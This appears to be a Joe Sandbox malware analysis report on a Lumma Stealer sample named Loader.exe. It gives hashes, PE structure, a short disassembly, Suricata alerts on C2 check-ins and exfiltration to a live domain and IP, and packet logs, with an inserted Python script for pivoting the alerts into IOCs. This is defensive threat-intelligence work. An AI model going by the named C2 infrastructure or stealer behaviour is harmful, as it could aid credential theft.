• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
20:56:55 | API Interceptor | 8x Sleep call for process: Loader.exe modified
Match: 104.21.48.1
Associated Sample Name / URL | Detection | Threat Name | Context
SH8ZyOWNi2.exe | malicious | CMSBrute | twirpx.org/administrator/index.php
SN500, SN150 Spec.exe | malicious | FormBook | www.antipromil.site/7ykh/
Match: fancywaxxers.shop
Associated Sample Name / URL | Detection | Threat Name | Context
Loader.exe | malicious | LummaC | 104.21.80.1
Solara-Roblox-Executor-v3.exe | malicious | LummaC | 104.21.96.1
Delta.exe | malicious | LummaC | 104.21.96.1
SMmAznmdAa.exe | malicious | LummaC | 104.21.48.1
zhMQ0hNEmb.exe | malicious | LummaC | 104.21.112.1
2RxMkSAgZ8.exe | malicious | LummaC | 104.21.64.1
Dl6wuWiQdg.exe | malicious | LummaC, Amadey, LummaC Stealer | 104.21.112.1
bzzF5OFbVi.exe | malicious | LummaC | 104.21.64.1
x6VtGfW26X.exe | malicious | LummaC | 104.21.112.1
Launcher.exe | malicious | LummaC | 104.21.96.1
Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
https://thetollroads.com-wfmo.xyz/us | malicious | Unknown | 104.17.25.14
http://img1.wsimg.com/blobby/go/9b6ed793-452c-4f8f-8f80-6847f4d114d7/downloads/71318864754.pdf | malicious | Unknown | 104.16.123.96
decrypt.exe | malicious | Unknown | 104.21.16.1
decrypt.exe | malicious | Unknown | 104.21.16.1
FW_ Carr & Jeanne Biggerstaff has sent you an ecard.msg | malicious | Unknown | 104.16.123.96
OPRfEWLTto.js | malicious | Unknown | 104.21.75.126
Loader.exe | malicious | LummaC | 172.67.157.249
ILxa85qCjP.js | malicious | Unknown | 172.67.175.217
PASS-1234.exe | malicious | LummaC | 104.21.96.1
Loader.exe | malicious | LummaC | 104.21.80.1
Match: a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | Detection | Threat Name | Context
Loader.exe | malicious | LummaC | 104.21.48.1
PASS-1234.exe | malicious | LummaC | 104.21.48.1
Loader.exe | malicious | LummaC | 104.21.48.1
Launcher_x64.exe | malicious | LummaC | 104.21.48.1
Solara-Roblox-Executor-v3.exe | malicious | LummaC | 104.21.48.1
Delta.exe | malicious | LummaC | 104.21.48.1
Active_Setup.exe | malicious | LummaC | 104.21.48.1
SMmAznmdAa.exe | malicious | LummaC | 104.21.48.1
zhMQ0hNEmb.exe | malicious | LummaC | 104.21.48.1
2RxMkSAgZ8.exe | malicious | LummaC | 104.21.48.1
No context
No created / dropped files found
File type: PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit): 7.822383525403777
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Loader.exe
File size: 822'784 bytes
MD5: 0792fce4557cae0687a02e5e41be587a
SHA1: 1bac30844ed9b13082a7df999518b0cc59759278
SHA256: 6e7b661fb3b6610bc026dd050824e7faaf3bd3b5fa0b168d941858fc694ba871
SHA512: b7fb793442afa46c3ba8a3066adaf94453a5324bf717904bb564fde1b14471245e3cd77b6bfff4a5c236551ec4f5ee091121fd6827635c4ddb3394dd627e1426
SSDEEP: 12288:h3K1Pp+lMeB8MFA6ln2KKV+FV9cEmRJ3Tn0FA6ln2KKV+FV9cEmRJ3Tn1:lK1PSMZ8A6JoM7cF3gA6JoM7cF3p
TLSH: F905015275C0C0B2C5632677A9F9E7B60A3DBD100B629ACF63C81BB68F316C55734A27
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....sg.................H........................@.......................................@.....................................(..
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x40a2e0
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows cui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp: 0x6773E4A4 [Tue Dec 31 12:33:40 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 019ac8c6e24f80fb88de699b6749f599
Instruction
call 00007FFAA8BF063Ah
jmp 00007FFAA8BF049Dh
mov ecx, dword ptr [004307C0h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007FFAA8BF0636h
test esi, ecx
jne 00007FFAA8BF0658h
call 00007FFAA8BF0661h
mov ecx, eax
cmp ecx, edi
jne 00007FFAA8BF0639h
mov ecx, BB40E64Fh
jmp 00007FFAA8BF0640h
test esi, ecx
jne 00007FFAA8BF063Ch
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [004307C0h], ecx
not ecx
pop edi
mov dword ptr [00430800h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [0042E8D8h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [0042E894h]
xor dword ptr [ebp-04h], eax
call dword ptr [0042E890h]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [0042E920h]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 00431AB8h
call dword ptr [0042E8F8h]
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov al, 01h
ret
push 00030000h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e6c4 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x34000 | 0xe8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x35000 | 0x1b90 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x2a9a8 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x26e40 | 0xc0 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2e834 | 0x148 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x247da | 0x24800 | ba0610d1e4ecb6f5f64959d9eb5b455a | False | 0.5549951840753424 | data | 6.559506263512015 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x26000 | 0x9eb4 | 0xa000 | 53eba87ddc7d2455b0ac2836680b1660 | False | 0.428271484375 | DOS executable (COM) | 4.9181666163124085 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x30000 | 0x2280 | 0x1600 | 112d0c9e43893ae5b7f96d23807996ac | False | 0.39506392045454547 | data | 4.581141173428789 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x33000 | 0x9 | 0x200 | 1f354d76203061bfdd5a53dae48d5435 | False | 0.033203125 | data | 0.020393135236084953 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x34000 | 0xe8 | 0x200 | 03d6bf5d1e31277fc8fb90374111d794 | False | 0.306640625 | data | 2.344915704357875 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x35000 | 0x1b90 | 0x1c00 | 3080b38ba0e27b64b3ab5ca0f93c1c7c | False | 0.7785993303571429 | data | 6.532705218372571 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.BSS | 0x37000 | 0x4b400 | 0x4b400 | f4a6f0ab2f6a1191734ef7d005e64463 | False | 1.0003276837624584 | data | 7.999361309867783 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.BSS | 0x83000 | 0x4b400 | 0x4b400 | f4a6f0ab2f6a1191734ef7d005e64463 | False | 1.0003276837624584 | data | 7.999361309867783 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x34060 | 0x87 | XML 1.0 document, ASCII text | English | United States | 0.8222222222222222
DLL | Import
KERNEL32.dll | AcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-01T02:56:55.706456+0100 | 2058656 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop) | 1 | 192.168.2.4 | 61080 | 1.1.1.1 | 53 | UDP
2025-01-01T02:56:56.188431+0100 | 2058657 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) | 1 | 192.168.2.4 | 49730 | 104.21.48.1 | 443 | TCP
2025-01-01T02:56:56.188431+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49730 | 104.21.48.1 | 443 | TCP
2025-01-01T02:56:56.941241+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49730 | 104.21.48.1 | 443 | TCP
2025-01-01T02:56:56.941241+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49730 | 104.21.48.1 | 443 | TCP
2025-01-01T02:56:57.422798+0100 | 2058657 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) | 1 | 192.168.2.4 | 49731 | 104.21.48.1 | 443 | TCP
2025-01-01T02:56:57.422798+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 104.21.48.1 | 443 | TCP
2025-01-01T02:56:57.893852+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49731 | 104.21.48.1 | 443 | TCP
2025-01-01T02:56:57.893852+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49731 | 104.21.48.1 | 443 | TCP
2025-01-01T02:56:58.724005+0100 | 2058657 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) | 1 | 192.168.2.4 | 49732 | 104.21.48.1 | 443 | TCP
2025-01-01T02:56:58.724005+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49732 | 104.21.48.1 | 443 | TCP
2025-01-01T02:56:59.828044+0100 | 2058657 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) | 1 | 192.168.2.4 | 49733 | 104.21.48.1 | 443 | TCP
2025-01-01T02:56:59.828044+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49733 | 104.21.48.1 | 443 | TCP
2025-01-01T02:57:00.384585+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49733 | 104.21.48.1 | 443 | TCP
2025-01-01T02:57:01.065590+0100 | 2058657 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) | 1 | 192.168.2.4 | 49734 | 104.21.48.1 | 443 | TCP
2025-01-01T02:57:01.065590+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49734 | 104.21.48.1 | 443 | TCP
2025-01-01T02:57:02.521703+0100 | 2058657 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) | 1 | 192.168.2.4 | 49735 | 104.21.48.1 | 443 | TCP
2025-01-01T02:57:02.521703+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49735 | 104.21.48.1 | 443 | TCP
                                                                                                2025-01-01T02:57:04.160117+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449736104.21.48.1443TCP
                                                                                                2025-01-01T02:57:04.160117+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736104.21.48.1443TCP
                                                                                                2025-01-01T02:57:04.233693+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.449736104.21.48.1443TCP
                                                                                                2025-01-01T02:57:06.388204+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449737104.21.48.1443TCP
                                                                                                2025-01-01T02:57:06.388204+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737104.21.48.1443TCP
                                                                                                2025-01-01T02:57:06.874165+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449737104.21.48.1443TCP
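The alert table above is easier to reason about per TLS connection than per row: every client source port (49730 through 49737) is one request to the C2 host, the SNI and JA3 hits only show that the handshake happened, and the remaining signatures say what each request carried. The script below is an added example and not part of the Joe Sandbox report; it embeds the 24 alert records from the table as tuples, extracts the indicators (re-joining the report's defanging space in "fancywaxxers .shop" and re-defanging it as "fancywaxxers[.]shop"), groups the alerts by connection and labels each connection from the signature text. The stage labels and the domain regex are this example's own assumptions, not something the report or Suricata defines.

```python
"""Pivot Joe Sandbox Suricata alerts into per-connection C2 stages and IOCs.

Added example, not code from the Joe Sandbox report. ALERTS is copied from the
report's Suricata table (Analysis ID 1582939) with signature text kept verbatim,
including the defanging space Joe Sandbox inserts before the TLD.
"""
from collections import defaultdict
from datetime import datetime
import re

SNI = "ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)"
JA3 = "ET JA3 Hash - Possible Malware - Fake Firefox Font Update"
CHECKIN = "ET MALWARE Lumma Stealer CnC Host Checkin"

# (timestamp, sid, signature, severity, src_ip, src_port, dst_ip, dst_port, proto)
ALERTS = [
    ("2025-01-01T02:56:55.706456+0100", 2058656, "ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)", 1, "192.168.2.4", 61080, "1.1.1.1", 53, "UDP"),
    ("2025-01-01T02:56:56.188431+0100", 2058657, SNI, 1, "192.168.2.4", 49730, "104.21.48.1", 443, "TCP"),
    ("2025-01-01T02:56:56.188431+0100", 2028371, JA3, 3, "192.168.2.4", 49730, "104.21.48.1", 443, "TCP"),
    ("2025-01-01T02:56:56.941241+0100", 2049836, "ET MALWARE Lumma Stealer Related Activity", 1, "192.168.2.4", 49730, "104.21.48.1", 443, "TCP"),
    ("2025-01-01T02:56:56.941241+0100", 2054653, CHECKIN, 1, "192.168.2.4", 49730, "104.21.48.1", 443, "TCP"),
    ("2025-01-01T02:56:57.422798+0100", 2058657, SNI, 1, "192.168.2.4", 49731, "104.21.48.1", 443, "TCP"),
    ("2025-01-01T02:56:57.422798+0100", 2028371, JA3, 3, "192.168.2.4", 49731, "104.21.48.1", 443, "TCP"),
    ("2025-01-01T02:56:57.893852+0100", 2049812, "ET MALWARE Lumma Stealer Related Activity M2", 1, "192.168.2.4", 49731, "104.21.48.1", 443, "TCP"),
    ("2025-01-01T02:56:57.893852+0100", 2054653, CHECKIN, 1, "192.168.2.4", 49731, "104.21.48.1", 443, "TCP"),
    ("2025-01-01T02:56:58.724005+0100", 2058657, SNI, 1, "192.168.2.4", 49732, "104.21.48.1", 443, "TCP"),
    ("2025-01-01T02:56:58.724005+0100", 2028371, JA3, 3, "192.168.2.4", 49732, "104.21.48.1", 443, "TCP"),
    ("2025-01-01T02:56:59.828044+0100", 2058657, SNI, 1, "192.168.2.4", 49733, "104.21.48.1", 443, "TCP"),
    ("2025-01-01T02:56:59.828044+0100", 2028371, JA3, 3, "192.168.2.4", 49733, "104.21.48.1", 443, "TCP"),
    ("2025-01-01T02:57:00.384585+0100", 2048094, "ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration", 1, "192.168.2.4", 49733, "104.21.48.1", 443, "TCP"),
    ("2025-01-01T02:57:01.065590+0100", 2058657, SNI, 1, "192.168.2.4", 49734, "104.21.48.1", 443, "TCP"),
    ("2025-01-01T02:57:01.065590+0100", 2028371, JA3, 3, "192.168.2.4", 49734, "104.21.48.1", 443, "TCP"),
    ("2025-01-01T02:57:02.521703+0100", 2058657, SNI, 1, "192.168.2.4", 49735, "104.21.48.1", 443, "TCP"),
    ("2025-01-01T02:57:02.521703+0100", 2028371, JA3, 3, "192.168.2.4", 49735, "104.21.48.1", 443, "TCP"),
    ("2025-01-01T02:57:04.160117+0100", 2058657, SNI, 1, "192.168.2.4", 49736, "104.21.48.1", 443, "TCP"),
    ("2025-01-01T02:57:04.160117+0100", 2028371, JA3, 3, "192.168.2.4", 49736, "104.21.48.1", 443, "TCP"),
    ("2025-01-01T02:57:04.233693+0100", 2843864, "ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2", 1, "192.168.2.4", 49736, "104.21.48.1", 443, "TCP"),
    ("2025-01-01T02:57:06.388204+0100", 2058657, SNI, 1, "192.168.2.4", 49737, "104.21.48.1", 443, "TCP"),
    ("2025-01-01T02:57:06.388204+0100", 2028371, JA3, 3, "192.168.2.4", 49737, "104.21.48.1", 443, "TCP"),
    ("2025-01-01T02:57:06.874165+0100", 2054653, CHECKIN, 1, "192.168.2.4", 49737, "104.21.48.1", 443, "TCP"),
]


def parse_ts(ts: str) -> datetime:
    """Suricata timestamps carry a numeric UTC offset, which %z accepts."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")


def extract_iocs(alerts):
    """Return (defanged domains, C2 IPs). Domains come from the parenthesised
    '(name .tld' text in the signature (the space is Joe Sandbox's defanging and
    this regex is an assumption of the example); C2 IPs are TCP/443 destinations
    that raised a severity-1 alert, which leaves out the DNS resolver."""
    domains, ips = set(), set()
    for _ts, _sid, sig, sev, _sip, _sport, dip, dport, proto in alerts:
        m = re.search(r"\(([a-z0-9-]+) \.([a-z]+)", sig)
        if m:
            domains.add(f"{m.group(1)}[.]{m.group(2)}")
        if proto == "TCP" and dport == 443 and sev == 1:
            ips.add(dip)
    return sorted(domains), sorted(ips)


def sessions(alerts):
    """Group TCP alerts by client source port: one Lumma request per connection."""
    by_port = defaultdict(list)
    for ts, sid, sig, sev, _sip, sport, _dip, _dport, proto in alerts:
        if proto == "TCP":
            by_port[sport].append((parse_ts(ts), sid, sig, sev))
    return dict(sorted(by_port.items()))


def stage(session):
    """Label a connection from its content-level alerts. SNI and JA3 hits only
    prove the TLS handshake to the C2 host; the labels below are the example's
    own reading of the other signature names, not a Suricata classification."""
    sigs = [sig for _ts, _sid, sig, _sev in session]
    if any("Zipped Filename" in s for s in sigs):
        return "upload (zipped 'screen.' POST)"
    if any("Exfiltration" in s for s in sigs):
        return "exfiltration"
    if any("Checkin" in s for s in sigs):
        return "checkin"
    return "handshake only (no content signature)"


def timeline(alerts):
    """Per connection: (client port, first alert time, seconds from the SNI hit
    to the first content-level hit or None, stage label)."""
    rows = []
    for port, session in sessions(alerts).items():
        session.sort()
        t0 = session[0][0]
        content = [t for t, _sid, sig, _sev in session if sig not in (SNI, JA3)]
        delay = round((min(content) - t0).total_seconds(), 3) if content else None
        rows.append((port, t0.strftime("%H:%M:%S.%f"), delay, stage(session)))
    return rows


if __name__ == "__main__":
    print("IOCs:", extract_iocs(ALERTS))
    for row in timeline(ALERTS):
        print(row)
```

Run as-is, the timeline shows eight connections to 104.21.48.1: two check-ins (49730, 49731), the exfiltration hit on 49733, the zipped "screen." POST on 49736, a closing check-in on 49737, and three connections (49732, 49734, 49735) where only the SNI and JA3 signatures fired. Those three are still C2 traffic to the same host; the absence of a content-level alert there is a reminder that hunting on the domain and IP indicators catches more than hunting on the payload signatures alone.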
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 1, 2025 02:56:55.724112988 CET | 49730 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:55.724159002 CET | 443 | 49730 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:55.724231958 CET | 49730 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:55.727045059 CET | 49730 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:55.727061033 CET | 443 | 49730 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:56.188210964 CET | 443 | 49730 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:56.188431025 CET | 49730 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:56.191973925 CET | 49730 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:56.191996098 CET | 443 | 49730 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:56.192424059 CET | 443 | 49730 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:56.239005089 CET | 49730 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:56.239005089 CET | 49730 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:56.239140987 CET | 443 | 49730 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:56.941248894 CET | 443 | 49730 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:56.941344023 CET | 443 | 49730 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:56.941565990 CET | 49730 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:56.943289042 CET | 49730 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:56.943289042 CET | 49730 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:56.943351030 CET | 443 | 49730 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:56.943377972 CET | 443 | 49730 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:56.952259064 CET | 49731 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:56.952290058 CET | 443 | 49731 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:56.952394962 CET | 49731 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:56.952718019 CET | 49731 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:56.952728033 CET | 443 | 49731 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:57.422725916 CET | 443 | 49731 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:57.422797918 CET | 49731 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:57.424338102 CET | 49731 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:57.424341917 CET | 443 | 49731 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:57.424561024 CET | 443 | 49731 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:57.425796032 CET | 49731 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:57.425825119 CET | 49731 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:57.425860882 CET | 443 | 49731 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:57.893853903 CET | 443 | 49731 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:57.893924952 CET | 443 | 49731 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:57.893950939 CET | 443 | 49731 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:57.893981934 CET | 49731 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:57.893987894 CET | 443 | 49731 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:57.893997908 CET | 443 | 49731 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:57.894153118 CET | 49731 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:57.894167900 CET | 443 | 49731 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:57.894212008 CET | 49731 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:57.894355059 CET | 443 | 49731 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:57.898560047 CET | 443 | 49731 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:57.898588896 CET | 443 | 49731 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:57.898610115 CET | 49731 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:57.898614883 CET | 443 | 49731 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:57.898653984 CET | 443 | 49731 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:57.898669958 CET | 49731 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:57.898674965 CET | 443 | 49731 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:57.898710966 CET | 49731 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:57.982398033 CET | 443 | 49731 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:57.982453108 CET | 443 | 49731 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:57.982537031 CET | 443 | 49731 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:57.982614040 CET | 49731 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:57.982614040 CET | 49731 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:57.982784033 CET | 49731 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:57.982796907 CET | 443 | 49731 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:57.982808113 CET | 49731 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:57.982814074 CET | 443 | 49731 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:58.179162025 CET | 49732 | 443 | 192.168.2.4 | 104.21.48.1
